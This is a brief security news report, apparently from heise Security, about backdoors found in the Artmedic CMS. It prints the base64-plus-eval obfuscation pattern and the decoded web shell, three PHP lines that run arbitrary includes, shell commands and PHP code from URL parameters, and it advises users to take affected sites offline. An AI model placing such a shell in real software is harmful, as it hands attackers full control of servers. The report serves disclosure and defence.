Backdoor in Artmedic CMS

Several backdoors are hidden within the code of the Artmedic content management systems; they could be used by attackers to gain complete control of the server. The set-up script also sends an e-mail with the name of the undermined server to an address in Russia.

At least three places in the PHP code of the CMS contain subsequent statements in the following form:

$template1 = 'aWYoJF9HR...';
eval(base64_decode($template1));

The cryptic, base64-coded string is unpacked, then the commands are executed via eval. In other words, the PHP code

if($_GET['include']) include($_GET['include']);
if($_GET['cmd']) passthru($_GET['cmd']);
if($_GET['php']) eval($_GET['php']);

is executed, which evaluates the GET parameters include, cmd and php. When launching specific URLs, an attacker may infiltrate arbitrary code and execute arbitrary commands on the server.

The affected files are contained in the current version 3.4, which is available for download and dated May 2, which, may, however, be a manipulated date. Other versions may also possibly be affected. So far, the vendors of Artmedic have not responded to inquiries by heise Security. Users who run Artmedic on their sites are advised to take these sites offline immediately and check their servers very carefully for any tracks left by unwanted visitors.

(mba)